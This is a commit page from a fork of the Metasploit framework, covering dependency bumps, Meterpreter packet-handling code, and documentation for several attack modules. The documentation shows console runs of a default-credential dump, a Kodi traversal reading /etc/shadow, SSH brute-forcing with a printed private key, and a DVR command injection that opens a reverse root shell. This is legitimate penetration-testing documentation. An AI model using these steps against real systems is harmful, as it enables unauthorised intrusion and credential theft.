dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' into feature/aggregator

This commit is contained in:
Jeffrey Martin 2017-02-24 23:59:02 -06:00
parent 9186b3298a 09c9e9b1f9
commit 5383900a54
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
167 changed files with 1184 additions and 2881 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.13.26)
metasploit-framework (4.14.1)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -21,6 +21,7 @@ PATH
nessus_rest
net-ssh
network_interface
nexpose
nokogiri
octokit
openssl-ccm
@ -113,7 +114,7 @@ GEM
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.14.0)
contracts (0.15.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
@ -157,7 +158,7 @@ GEM
grpc (1.1.2)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.0)
i18n (0.8.1)
jsobfu (0.4.2)
rkelly-remix
json (2.0.3)
@ -214,6 +215,7 @@ GEM
nessus_rest (0.1.6)
net-ssh (4.1.0)
network_interface (0.0.1)
nexpose (5.3.0)
nokogiri (1.7.0.1)
mini_portile2 (~> 2.1.0)
octokit (4.6.2)
@ -270,7 +272,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.10)
rex-exploitation (0.1.11)
jsobfu
metasm
rex-arch
@ -342,7 +344,7 @@ GEM
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.19.4)
thread_safe (0.3.5)
thread_safe (0.3.6)
timecop (0.8.1)
tzinfo (1.2.2)
thread_safe (~> 0.1)
@ -374,4 +376,4 @@ DEPENDENCIES
yard
BUNDLED WITH
1.14.4
1.14.5

33
documentation/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.md Normal file
View File

@ -0,0 +1,33 @@
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer management login portal(s), and attempts to identify valid credentials. There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'. In addition to device config, 'root' user can also access password file. Other users - admin, alg, user - can only access configuration file. The module attempts to download configuration and password files depending on the login user credentials found.
## Verification Steps
1. Do: ```use auxiliary/scanner/http/binom3_login_config_pass_dump```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/http/binom3_login_config_pass_dump
msf auxiliary(binom3_login_config_pass_dump) > set rhosts 1.3.3.7
msf auxiliary(binom3_login_config_pass_dump) > run
[+] 1.3.3.7:80 - Binom3 confirmed...
[*] 1.3.3.7:80 - Trying username:"root" with password:"root"
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "root":"root"
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping configuration
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_Binom3_config_165927.txt
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7 - dumping password file
[+] ++++++++++++++++++++++++++++++++++++++
[+] 1.3.3.7:80 - File retrieved successfully!
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000004_moduletest_1.3.3.7_Binom3_passw_010954.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

41
documentation/modules/auxiliary/scanner/http/kodi_traversal.md Normal file
View File

@ -0,0 +1,41 @@
## Vulnerable Application
This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
**Vulnerable Application Installation Steps**
Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
You'll need a version lower than 17.1 of Kodi.
## Verification Steps
A successful run of the exploit will look like this:
```
msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > set FILE /etc/shadow
FILE => /etc/shadow
msf auxiliary(kodi_traversal) > run
[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
```

199
documentation/modules/auxiliary/scanner/ssh/ssh_login.md Normal file
View File

@ -0,0 +1,199 @@
## SSH Service
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
## Verification Steps
1. Install SSH and start it.
2. Start msfconsole
3. Do: ` use auxiliary/scanner/ssh/ssh_login`
4. Do: `set rhosts`
5. Do: set usernames and passwords via any of the available options
5. Do: `run`
6. You will hopefully see something similar to, followed by a session:
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
## Options
**BLANK_PASSWORD**
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
**PASSWORD**
Password to try for each user.
**PASS_FILE**
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USERPASS_FILE**
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
**USER_AS_PASS**
Boolean value on if an additional login attempt should be attempted with the password as the username.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following:
```
[-] SSH - Failed: 'msfadmin:virtual'
```
## Option Combinations
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
## Scenarios
Example run against:
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
* Ubuntu 16.04 Server: 192.168.2.137
* Metasploitable: 192.168.2.46
* Metasploitable 2: 192.168.2.35
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > cat /root/ssh_passwords.lst
[*] exec: cat /root/ssh_passwords.lst
msfadmin
badpassword
root
ubuntu
msf auxiliary(ssh_login) > set pass_file /root/ssh_passwords.lst
pass_file => /root/ssh_passwords.lst
msf auxiliary(ssh_login) > cat /root/ssh_un.lst
[*] exec: cat /root/ssh_un.lst
msfadmin
badpassword
root
ubuntu
msf auxiliary(ssh_login) > set user_file /root/ssh_un.lst
user_file => /root/ssh_un.lst
msf auxiliary(ssh_login) > cat /root/ssh_hosts.lst
[*] exec: cat /root/ssh_hosts.lst
192.168.2.156
192.168.2.137
192.168.2.35
192.168.2.46
msf auxiliary(ssh_login) > set rhosts file://root/ssh_hosts.lst
rhosts => file://root/ssh_hosts.lst
msf auxiliary(ssh_login) > set verbose false
verbose => false
msf auxiliary(ssh_login) > set threads 4
threads => 4
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[*] SSH - Starting bruteforce
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 5 opened (192.168.2.117:44415 -> 192.168.2.46:22) at 2017-02-22 20:26:13 -0500
[*] Command shell session 6 opened (192.168.2.117:36107 -> 192.168.2.35:22) at 2017-02-22 20:26:13 -0500
[+] SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 7 opened (192.168.2.117:32829 -> 192.168.2.156:22) at 2017-02-22 20:26:35 -0500
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 8 opened (192.168.2.117:42205 -> 192.168.2.156:22) at 2017-02-22 20:26:42 -0500
[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 9 opened (192.168.2.117:37027 -> 192.168.2.137:22) at 2017-02-22 20:26:44 -0500
[*] Scanned 3 of 4 hosts (75% complete)
[*] Scanned 4 of 4 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
5 shell /linux SSH msfadmin:msfadmin (192.168.2.46:22) 192.168.2.117:44415 -> 192.168.2.46:22 (192.168.2.46)
6 shell /linux SSH msfadmin:msfadmin (192.168.2.35:22) 192.168.2.117:36107 -> 192.168.2.35:22 (192.168.2.35)
7 shell /linux SSH root:ubuntu (192.168.2.156:22) 192.168.2.117:32829 -> 192.168.2.156:22 (192.168.2.156)
8 shell /linux SSH ubuntu:ubuntu (192.168.2.156:22) 192.168.2.117:42205 -> 192.168.2.156:22 (192.168.2.156)
9 shell /linux SSH ubuntu:ubuntu (192.168.2.137:22) 192.168.2.117:37027 -> 192.168.2.137:22 (192.168.2.137)
```
Example run against:
* Windows 10 w/ Linux Subsystem
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
rhosts => 192.168.2.140
msf auxiliary(ssh_login) > set username winuser
username => winuser
msf auxiliary(ssh_login) > set password "badpassword"
password => badpassword
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'winuser:badpassword' ''
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:42227 -> 192.168.2.140:22) at 2017-02-22 20:40:12 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell / SSH winuser:badpassword (192.168.2.140:22) 192.168.2.117:42227 -> 192.168.2.140:22 (192.168.2.140)
```
Example run against:
* Windows 10 w/ Bitvise SSH Server (WinSSHD) version 7.26-r2 and a virtual account created
It is important to note here that the module gives back a **Success**, but then errors when trying to identify the remote system.
This should be enough info to manually exploit via a regular SSH command.
```
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.2.140
rhosts => 192.168.2.140
msf auxiliary(ssh_login) > set username virtual
username => virtual
msf auxiliary(ssh_login) > set password virtual
password => virtual
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'virtual:virtual' 'id: Command not found. help ?: Command not found. '
[!] No active DB -- Credential data will not be saved!
[*] 192.168.2.140 - Command shell session 4 closed. Reason: Died from EOFError
[*] Command shell session 4 opened (192.168.2.117:36169 -> 192.168.2.140:22) at 2017-02-22 21:20:24 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

141
documentation/modules/auxiliary/scanner/ssh/ssh_login_pubkey.md Normal file
View File

@ -0,0 +1,141 @@
## SSH Service
SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level. SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
It should be noted that some modern Operating Systems have default configurations to not allow the `root` user to remotely login via SSH, or to only allow `root` to login with an SSH key login.
### Key Generation
On most modern *nix Operating System, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no password should be set during `ssh-keygen`.
After following the prompts to create the SSH key pair, the `pub` key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
## Verification Steps
1. Install SSH and start it.
2. Create an SSH keypair and add the public key to the `authorized_keys` file
3. Start msfconsole
4. Do: ` use auxiliary/scanner/ssh/ssh_login_pubkey`
5. Do: `set rhosts`
6. Do: set usernames with one of the available options
7. Do: `set KEY_PATH ` to either a file or path
7. Do: `run`
8. You will hopefully see something similar to the following:
```
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
```
## Options
**KEY_PATH**
A string to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a password will start with `-----BEGIN RSA PRIVATE KEY-----`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
## Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
## Scenarios
Example run with a FOLDER set for `KEY_PATH` against:
* Ubuntu 14.04 Server
While the two SSH key are nearly identical, one character has been modified in one of the keys to prevent a successful login.
```
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
key_path => /root/sshkeys/
msf auxiliary(ssh_login_pubkey) > run
[*] 192.168.2.156:22 SSH - Testing Cleartext Keys
[*] SSH - Testing 2 keys from /root/sshkeys
[-] SSH - Failed: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
aAz8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
'
[!] No active DB -- Credential data will not be saved!
[+] SSH - Success: 'ubuntu:-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAtwJrqowPyjWONHUCMqU/Fh3yRn42+X9hahtTv/6plYpb4WrA
NxDaYIrBGAO//u2SkGcIhnAdzYVmovWahKEwcxZ2XJo/nj4gjh1CbI1xVCFeE/oX
oWpIN+4q8JQ0Iq1dm+c+WPQIEzlVpMRaKeuMxdGPNMTYWxolSEIMPPYmyWXG6gz8
fYYZDo8+w8G78w7oUV6hSIwCDzw09A5yGyt51ZETeSZiZ24bHlBQSyk7yFq/eo58
xhlc79jpZrSdX8kx8HrCZKND7O6E4YSktfSHOvd81QUCSyoi5Y+9RXsLjUEba0+Y
0Az8mZPLdxbRu75eeD/mZTv5gALewXeb65IkPQIDAQABAoIBACvi5LbNR6wSE7v4
o0JJ5ksDe2n0MnK6XT34t6i/BSPbPhVcaCPMYtHr9Eox/ATCK/d8/cpfcIYsi2Rg
yWEs1lWC+XdTdhYYh+4MjjVB5f9q0QixXKFUv2TKNHnk0GvQbzZHyefC/Xy+rw8I
FyceWW/GxTS+T7PpHS+qxwyHat24ph7Xz/cE/0UyrVu+NAzFXaHq60M2/RRh3uXE
1vqiZVlapczO/DxsnPwQrE2EOm0lzrQVmZbX5BYK1yiCd5eTgLhOb+ms2p/8pb2I
jrK5FzLnUZu0H0ZHtihOVkx4l8NZqB36jinaRs0wWN7It4/C5+NkyoMvuceIn1Wx
tstYD3ECgYEA7sOb0CdGxXw0IVrJF+3C8m1UG3CfQfzms+rJb9w3OJVl2BTlYdPr
JgXI/YoV9FQPvXmTWrRP9e6x0kuSVHO1ejMpyLHGmMcJDZhpVKMROOosIWfROxwk
bkPU2jdUXIrHgu8NnmnyytjUnJgeerQZLhCtjKmBKCZisS4WPBdun3MCgYEAxDh1
fjFJttWhgeg6pcvvmDUWO1W0lJ9ZjjQll1UmbPmKDGwwsjPZEkZfLkvI77st81AT
eW/p7tMKE3fCkXkn2KWMQ6ZGN5yflwvjJOMAVZz8ir8Cu1npa6f6HIrxpHSKethY
dG4ssCpQctfoRfN4wg6fOHBOpGd3BH1GdOwR4Y8CgYEAq3h7e//ZCZbrcVDbvn2Y
VbZCgvpcxW002d0yEU2bst1IKOjI23rwE3xwHfV/UtrT+wVG2AtKqZpkxlxTmKcI
m9wGlAVoVOwMCmF8s7XwdmlmjA8c6lCJsU6xnI3D3jokklnP9AauwRL7jgKJUSHq
O3TqzmwlP4phslEg0sMZRRUCgYEAwkS3prG7rqYBmjFG52FqnIJquWIYQFEoBE+C
rDqkqZ3B3Jy89aG5l4tOrvJfRWJHky7DqSZxMH+G6VFXtFmEZs04er3DpUmPA6fE
Qn/wk9KygdetJ7pUDL8pNFsn9M9hT1Ck+tkdq2ipb5ptn9v2wgJiBynB4qmBP1Oc
jyQua+cCgYEAl77hJQK97tdJ5TuOXSsdpW8IMvbiaWTgvZtKVJev31lWgJ+knpCf
AaZna5YokhaNvfGGbO5N8YoYShIpGdvWI+dIT8xYvPkJmYdnTz7/dmBUcwLtNVx/
7PI/l5XrFMRsnu/CYuBPuWB+RCTLjIr1D1RluNbIb7xr+kDHuzgInvA=
-----END RSA PRIVATE KEY-----
' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.2.117:44179 -> 192.168.2.156:22) at 2017-02-22 22:08:11 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

43
documentation/modules/exploit/linux/http/mvpower_dvr_shell_exec.md Normal file
View File

@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits an unauthenticated remote command execution vulnerability in MVPower digital video recorders. The 'shell' file on the web interface executes arbitrary operating system commands in the query string.
This module was tested successfully on a MVPower model TV-7104HE with firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/linux/http/mvpower_dvr_shell_exec`
3. Do: `set rhost [IP]`
4. Do: `set lhost [IP]`
5. Do: `run`
6. You should get a session
## Example Run
```
msf exploit(mvpower_dvr_shell_exec) > run
[*] Started reverse TCP handler on 10.1.1.197:4444
[*] 10.1.1.191:80 - Connecting to target
[+] 10.1.1.191:80 - Target is vulnerable!
[*] Using URL: http://0.0.0.0:8080/BBRyjDtj81x3bTq
[*] Local IP: http://10.1.1.197:8080/BBRyjDtj81x3bTq
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.191:56881) at 2017-02-21 23:59:33 -0500
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 10.1.1.191
OS : (Linux 3.0.8)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >
```

0
documentation/modules/exploit/multi/fileformat/swagger_param_inject.md Executable file → Normal file
View File

0
documentation/modules/post/windows/manage/mssql_local_auth_bypass.md Executable file → Normal file
View File

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.13.26"
VERSION = "4.14.1"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

6
lib/msf/core/exploit/remote/browser_exploit_server.rb
View File

@ -430,7 +430,6 @@ module Msf
window.onload = function() {
var osInfo = os_detect.getVersion();
var d = {
"os_name" : osInfo.os_name,
"os_vendor" : osInfo.os_vendor,
"os_device" : osInfo.os_device,
"ua_name" : osInfo.ua_name,
@ -439,7 +438,8 @@ module Msf
"java" : misc_addons_detect.getJavaVersion(),
"silverlight" : misc_addons_detect.hasSilverlight(),
"flash" : misc_addons_detect.getFlashVersion(),
"vuln_test" : <%= js_vuln_test %>
"vuln_test" : <%= js_vuln_test %>,
"os_name" : osInfo.os_name
};
<% if os.match(OperatingSystems::Match::WINDOWS) and client == HttpClients::IE %>
@ -501,7 +501,7 @@ module Msf
%Q|
<script>
#{code}
#{js}
</script>
<noscript>
<img style="visibility:hidden" src="#{get_resource.chomp("/")}/#{@noscript_receiver_page}/">

2618
lib/rapid7/nexpose.rb
View File

File diff suppressed because it is too large Load Diff

46
lib/rex/post/meterpreter/packet_dispatcher.rb
View File

@ -284,6 +284,20 @@ module PacketDispatcher
# Reception
#
##
#
# Simple class to track packets and if they are in-progress or complete.
#
class QueuedPacket
attr_reader :packet
attr_reader :in_progress
def initialize(packet, in_progress)
@packet = packet
@in_progress = in_progress
end
end
#
# Monitors the PacketDispatcher's sock for data in its own
# thread context and parsers all inbound packets.
@ -306,8 +320,8 @@ module PacketDispatcher
begin
rv = Rex::ThreadSafe.select([ self.sock.fd ], nil, nil, PING_TIME)
if rv
packet = receive_packet
@pqueue << packet if packet
packet, in_progress = receive_packet
@pqueue << QueuedPacket.new(packet, in_progress)
elsif self.send_keepalives && @pqueue.empty?
keepalive
end
@ -342,11 +356,11 @@ module PacketDispatcher
tmp_channel = []
tmp_close = []
backlog.each do |pkt|
if(pkt.response?)
if(pkt.packet.response?)
tmp_command << pkt
next
end
if(pkt.method == "core_channel_close")
if(pkt.packet.method == "core_channel_close")
tmp_close << pkt
next
end
@ -365,7 +379,7 @@ module PacketDispatcher
backlog.each do |pkt|
begin
if ! dispatch_inbound_packet(pkt)
if ! dispatch_inbound_packet(pkt.packet, pkt.in_progress)
# Keep Packets in the receive queue until a handler is registered
# for them. Packets will live in the receive queue for up to
# PACKET_TIMEOUT seconds, after which they will be dropped.
@ -373,13 +387,15 @@ module PacketDispatcher
# A common reason why there would not immediately be a handler for
# a received Packet is in channels, where a connection may
# open and receive data before anything has asked to read.
if (::Time.now.to_i - pkt.created_at.to_i < PACKET_TIMEOUT)
#
# Also, don't bother saving incomplete packets if we have no handler.
if (!pkt.in_progress and ::Time.now.to_i - pkt.packet.created_at.to_i < PACKET_TIMEOUT)
incomplete << pkt
end
end
rescue ::Exception => e
dlog("Dispatching exception with packet #{pkt}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
dlog("Dispatching exception with packet #{pkt.packet}: #{e} #{e.backtrace}", 'meterpreter', LEV_1)
end
end
@ -459,12 +475,16 @@ module PacketDispatcher
# Notifies a whomever is waiting for a the supplied response,
# if anyone.
#
def notify_response_waiter(response)
# For not-yet-complete responses, we might not be able to determine
# the response ID, in that case just let all waiters know that some
# responses are trickling in.
#
def notify_response_waiter(response, in_progress=false)
handled = false
self.waiters.each() { |waiter|
if (waiter.waiting_for?(response))
waiter.notify(response)
remove_response_waiter(waiter)
if (in_progress || waiter.waiting_for?(response))
waiter.notify(response, in_progress)
remove_response_waiter(waiter) unless in_progress
handled = true
break
end
@ -498,7 +518,7 @@ module PacketDispatcher
# Otherwise, the packet is passed onto any registered dispatch
# handlers until one returns success.
#
def dispatch_inbound_packet(packet)
def dispatch_inbound_packet(packet, in_progress=false)
handled = false
# Update our last reply time
@ -507,7 +527,7 @@ module PacketDispatcher
# If the packet is a response, try to notify any potential
# waiters
if packet.response?
if (notify_response_waiter(packet))
if (notify_response_waiter(packet, in_progress))
return true
end
end

21
lib/rex/post/meterpreter/packet_parser.rb
View File

@ -75,22 +75,27 @@ class PacketParser
end
end
in_progress = true
